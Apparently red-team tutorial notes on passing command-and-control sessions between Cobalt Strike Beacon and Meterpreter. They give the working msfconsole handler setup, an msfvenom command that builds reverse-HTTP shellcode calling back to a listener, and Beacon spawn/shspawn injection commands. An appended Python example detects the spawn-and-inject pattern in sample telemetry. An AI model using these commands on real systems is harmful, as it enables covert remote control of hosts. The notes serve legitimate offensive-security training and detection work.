Session Passing

Session passing is a process where you spawn a new C2 session from one payload/listener type to another. It's also possible to pass sessions between completely different C2 frameworks, such as spawning a Meterpreter session from Beacon.

- Beacon Passing

The spawn command will spawn an x86 or x64 process and inject shellcode for the specified listener into it.

For example, suppose you have a DNS Beacon and, instead of operating through it, you want to leave it open as a lifeline on a slow check-in. In that case, you can spawn a new HTTP session and work from there instead.

spawn x64 http

- Foreign Listener

The foreign listener in Cobalt Strike is designed to stage Meterpreter HTTP/HTTPS implants from Beacon, although it's technically compatible with any implant that supports the MSF staging protocol. Start msfconsole and create a new reverse HTTP Meterpreter listener. (You must use the "staged" reverse_http payload type and ensure you use a port that Cobalt Strike is not already listening on.)

sudo msfconsole -q

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set LHOST ens5

set LPORT 8080

run

Then, in Cobalt Strike, create a new Foreign HTTP listener. The stager host and port must match your MSF multi handler.

This listener will now be available within all the relevant Beacon commands such as spawn, jump and elevate. For instance, spawn msf will spawn a process and inject Meterpreter shellcode into it, thus giving us a Meterpreter session.

Two downsides of the foreign listener are that it only supports x86 payloads and only staged ones (no x64 or stageless).

- Spawn & Inject

Cobalt Strike has two further generic injection commands that can be utilised for the purpose of session passing: shinject and shspawn. Both allow you to inject an arbitrary shellcode blob - shinject can inject into an existing process, and shspawn will spawn a new process.

We have to use a stageless x64 Meterpreter payload.

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_http

msf6 exploit(multi/handler) > exploit

ubuntu@DESKTOP-3BSK7NO ~> msfvenom -p windows/x64/meterpreter_reverse_http LHOST=10.10.5.50 LPORT=8080 -f raw -o /mnt/c/Payloads/msf_http_x64.bin

beacon> shspawn x64 C:\Payloads\msf_http_x64.bin
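From the defender's side, spawn and shspawn can both be hunted as one sequence: a process creates a child, writes a thread into it shortly afterwards, and the child then opens an outbound connection. The correlation below is an added example, not part of the original notes; the event schema, process names and 10-second window are assumptions, and whether the injection is logged as a cross-process thread depends on the sensor and the injection method in use.

```python
from collections import namedtuple

Finding = namedtuple("Finding", "parent_pid child_pid image dst dport")

# Constructed sample telemetry (hypothetical schema); t is seconds since capture start.
EVENTS = [
    {"t": 0,  "type": "proc_create", "pid": 4120, "ppid": 988, "image": "updater.exe"},
    {"t": 2,  "type": "net_conn", "pid": 4120, "dst": "203.0.113.10", "dport": 443},
    {"t": 30, "type": "proc_create", "pid": 5312, "ppid": 2764, "image": "svc_helper.exe"},
    {"t": 31, "type": "remote_thread", "src_pid": 2764, "dst_pid": 5312},
    {"t": 33, "type": "net_conn", "pid": 5312, "dst": "10.10.5.50", "dport": 8080},
    {"t": 50, "type": "proc_create", "pid": 6001, "ppid": 2764, "image": "viewer.exe"},
    {"t": 51, "type": "remote_thread", "src_pid": 2764, "dst_pid": 6001},
]

def find_spawn_inject(events, window=10):
    """Flag children injected by their own parent soon after creation that then connect out."""
    created = {}    # child pid -> (creation time, parent pid, image)
    injected = {}   # child pid -> time its parent created a thread in it
    findings = []
    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["type"] == "proc_create":
            created[ev["pid"]] = (ev["t"], ev["ppid"], ev["image"])
            injected.pop(ev["pid"], None)  # pid reuse: drop state from the old process
        elif ev["type"] == "remote_thread":
            born = created.get(ev["dst_pid"])
            # Only the creating parent writing into a fresh child matches the pattern.
            if born and born[1] == ev["src_pid"] and ev["t"] - born[0] <= window:
                injected[ev["dst_pid"]] = ev["t"]
        elif ev["type"] == "net_conn":
            hit = injected.get(ev["pid"])
            if hit is not None and ev["t"] - hit <= window:
                _, ppid, image = created[ev["pid"]]
                findings.append(Finding(ppid, ev["pid"], image, ev["dst"], ev["dport"]))
                del injected[ev["pid"]]  # report each injected child once
    return findings

if __name__ == "__main__":
    for f in find_spawn_inject(EVENTS):
        print(f"pid {f.parent_pid} spawned and injected {f.image} (pid {f.child_pid}), "
              f"which connected to {f.dst}:{f.dport}")
```

The child that connects out without being injected (pid 4120) and the injected child that never connects (pid 6001) are both left unflagged; only the full sequence is reported.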
